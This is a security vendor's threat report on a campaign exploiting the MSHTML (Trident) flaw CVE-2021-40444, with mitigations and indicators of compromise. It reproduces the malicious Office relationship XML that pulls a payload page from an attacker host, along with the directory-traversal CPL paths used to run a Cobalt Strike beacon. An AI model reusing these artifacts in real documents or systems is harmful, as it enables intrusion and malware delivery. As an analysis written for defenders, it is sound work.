Trident Campaign: Microsoft Office RCE Zero-day Exploitation Techniques and Mitigation Measures

Summary

Following several attacks targeting the RCE flaw in MSHTML, CloudSEK Threat Intelligence Research team shares the TTPs and IOCs of the attack sequence

Overview

MSHTML (Microsoft HTML) engine, aka Trident, is a browser engine developed by Microsoft for Internet Explorer. The Microsoft Office suite supports MSHTML, which is being abused by threat actors to gain code execution on targeted systems. Attackers craft a malicious ActiveX control, which is then abused by a Microsoft Office document that hosts the browser rendering engine. They then persuade the victim to open this malicious document, which in turn triggers the logical flaw in MSHTML.    These malicious documents are delivered via Office 365. By default, the documents downloaded from the Internet are opened in Protected View or Application Guard for Office, both of which defend against such attacks. However, if the user continues to download the content bypassing the mitigation measures, the target machine will be exploited, and malware agents such as CobaltStrike Beacon are deployed.    Microsoft Defender for Endpoint has been updated to flag such attacks, displaying a warning note that reads: “Suspicious Cpl File Execution.” Based on the quality of the vulnerability research and scale at which users are being targeted, it is most likely that an advanced adversary is responsible for the ongoing campaign.   CloudSEK Threat Intelligence Research team has obtained malicious artifacts to retrieve the TTPs (Tactics, Techniques, and Procedures) used by the adversaries that leverage the MSHTML RCE bug to provide better security for our clients. This report provides the technical analysis of the campaign. Specifics regarding the exploit for the vulnerability have been intentionally withheld to avoid misuse in the public domain as a large number of systems continue to be susceptible.  

Remote Template Injection Technique

  Microsoft Word/ Excel documents are an archived collection of XML files that retain the information and data provided by the user while creating the document on corresponding Office applications. In simple words, one can easily unzip the doc files to see internal XML files that contain various metadata. The directory  “word\_rels” in unzipped Word/ Excel files plays a very significant role in weaponizing a seemingly benign document.  
The process by which the users’ are attacked via Trident vulnerabilityThe process by which the users’ are attacked via Trident vulnerability
The process by which the users’ are attacked via Trident vulnerability
  The directory ‘_rels’ stores relationship metadata which helps to fetch the template used by the document when it gets loaded by Office. An SMB address or HTTP URL of the asset controlled by the attacker can be provided to execute the malicious payload. For the remote template injection vector, we need to search for <Relationship> XML attributes, for which the TargetMode is set to ”External”.    In this case, we could search for a malicious URL to exploit the code provided as a value to the <Relationship> attribute, where <TargetMode> is external. Office, then, downloads the specific file that the particular URL points to.  
<?xml version="1.0" encoding="UTF-8" standalone="true"?> -<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Target="theme/theme1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Id="rId8"/> <Relationship Target="webSettings.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Id="rId3"/> <Relationship Target="fontTable.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Id="rId7"/> <Relationship Target="settings.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Id="rId2"/> <Relationship Target="styles.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Id="rId1"/> <Relationship Target="mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Id="rId6" TargetMode="External"/> <Relationship Target="media/image2.wmf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId5"/> <Relationship Target="media/image1.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/> </Relationships>
Remote template injection used in obtained Trident campaign samples     The malicious docx sample, when executed, loads a webpage named ‘side.html’, hosted on an attacker-controlled server via remote template injection. Since the campaign targets the MSHTML engine supported on Office platforms, loading the HTML document occurs naturally.  

Exploitation 

The malicious webpage ‘side.html’ fetched by the document contains a heavily obfuscated JavaScript code that exploits the CVE-2021-40444 vulnerability that has no official patch at the time of writing this report. Execution of this phase leads to retrieval of the final payload for command and control.  
HTML contents of the malicious webpage ‘side.html’
  Analysis of the exploit code after deobfuscating the JavaScript code gives us a fair idea about the complete exploitation process. Considering the sensitive nature of the issue, this report does not cover details of the vulnerability.    A section of the deobfuscated exploit code is shown below. The attacker managed to reach the vulnerability using ActiveXObject to gain code execution. The code reaches out to the attacker's server that hosts the final payload. The file ‘ministry.cab’ is a Windows cabinet file, very similar to a zip archive that contains Cobalt Strike beacon in the form of a CPL file, which masquerades as an INF file.   
A section of the deobfuscated exploit code
A section of the deobfuscated exploit code
  The cabinet file is retrieved from a remote URL, and the INF file gets stored in one of the directories listed in the image below. The exploit code abuses directory traversal to execute the Cobalt Strike CPL beacon, which masquerades as ‘champion.inf’.   
A section of the deobfuscated exploit code
A section of the deobfuscated exploit code
  The cpl payload ‘ champion.inf ’, is eventually executed by ‘ rundll32.exe’ with the following command:    ' .cpl:../../../AppData/Local/Temp/Low/championship.inf '  

Cobalt Strike Beacon

  A basic image analysis shows that the ‘champion.inf' file is, in fact, a 64-bit DLL (Dynamic Link Library) and its first bytes text is “MZ.” The CPL file is a control panel item that has code execution capabilities. A DLL becomes CPL when it exports a particular function called ‘CplApplet', which can be readily executed like a PE (Portable Executable).  
Image analysis of ‘ Champion.inf ‘
Image analysis of ‘ Champion.inf ‘
  Windows Defender flags this as “Trojan:Win32/Agent.SA", and the other security solutions flag it as “Trojan.Win64.COBEACON.SUZ."  

Dynamic Analysis of the Exploit

  When the exploit code successfully triggers the vulnerability to gain remote code execution, the payload deployed as a result of the code execution is a Cobalt Strike beacon as discussed above. CloudSEK researchers recreated the exploit code and ran it to get a better understanding of the vulnerability. The researchers used Process Monitor to analyse the execution flow of the Office document (WINWORD.EXE) and found few interesting results that are shared below.  
Loading of Vulnerable Module 
Microsoft Word application loads mshtml.dll from Windows Directory. The vulnerability resides in one of the functionalities defined in the DLL files.  
DLL files
Windows Directory DLL files
  Based on CloudSEK’s testing, mshtml.dll is not loaded into WINWORD.EXE by default. When the attacker delivers an exploit written in HTML via Remote Template Injection, the handler provided in the <Relationship> attribute is mhtml. This leads to loading the mshtml module into the Word application to render the HTML page within the Word document.   
File Writing 
Final payload championship.inf is extracted from the initial ministry.cab archive file and is written to the Temp directory. This is probably caused by the vulnerability which is abused by adversaries to write user-controlled data on the file disk.    
Code Execution 
CloudSEK researchers also identified multiple control.exe processes that are spawned to execute the given CPL payload. Each of these processes search for the champion.inf file in directories that are hardcoded in the exploit. Here’s a list of the hardcoded directories to which the payload is dropped.  
cpl:../../../AppData/Local/Temp/Low/championship.inf
.cpl:../../../AppData/Local/Temp/championship.inf
cpl:../../../../AppData/Local/Temp/Low/championship.inf
cpl:../../../../AppData/Local/Temp/championship.inf
.cpl:../../../../../Temp/Low/championship.inf
.cpl:../../../../../Temp/championship.inf
.cpl:../../Low/championship.inf
.cpl:../../championship.inf
    The command lines provided to control.exe are shown in the image provided below. The argument provided is the location of the final payload and it is eventually executed by rundll32.    

Guidelines

Based on the official guidelines posted by Microsoft, Windows users need to follow the instructions given below:
  • Disable ActiveX via Group Policy*
  • Disable ActiveX on individual systems via registry
  • Disable shell preview in Windows Explorer
  • Enterprise customers who manage updates should select the detection build 1.349.22.0
  *Disabling ActiveX on Windows systems will have side effects depending on the user environment. For detailed information, refer to the official documentation issued by Microsoft.  

Indicators of Compromise (IOCs)

Sha-256 D0e1f97dbe2d0af9342e64d460527b088d85f96d38b1d1d4aa610c0987dca745
049ed15ef970bd12ce662cffa59f7d0e0b360d47fac556ac3d36f2788a2bc5a4
5b85dbe49b8bc1e65e01414a0508329dc41dc13c92c08a4f14c71e3044b06185
199b9e9a7533431731fbb08ff19d437de1de6533f3ebbffc1e13eeffaa4fd455
3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf
D0fd7acc38b3105facd6995344242f28e45f5384c0fdf2ec93ea24bfbc1dc9e6
938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52
URLs hxxp://hidusi[.]com/e8c76295a5f9acb7/side[.]html
hxxp://hidusi[.]com/e8c76295a5f9acb7/ministry[.]cab
hxxps://joxinu[.]com
hxxps://joxinu[.]com/hr[.]html
hxxps://dodefoh[.]com
hxxps://dodefoh[.]com/ml[.]html
hxxp://pawevi[.]com/e32c8df2cf6b7a16/specify.html
hxxp://sagoge[.]com/ 
hxxps://comecal[.]com/ 
hxxps://rexagi[.]com/ 
hxxp://sagoge[.]com/get_load 
hxxps://comecal[.]com/static-directory/templates[.]gif
hxxps://comecal[.]com/ml[.]js?restart=false 
hxxps://comecal[.]com/avatars 
hxxps://rexagi[.]com:443/avatars
hxxps://rexagi[.]com/ml[.]js?restart=false
hxxps://macuwuf[.]com 
hxxps://macuwuf[.]com/get_load
 

References

  https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444

Table of Contents

Request an easy and customized demo for free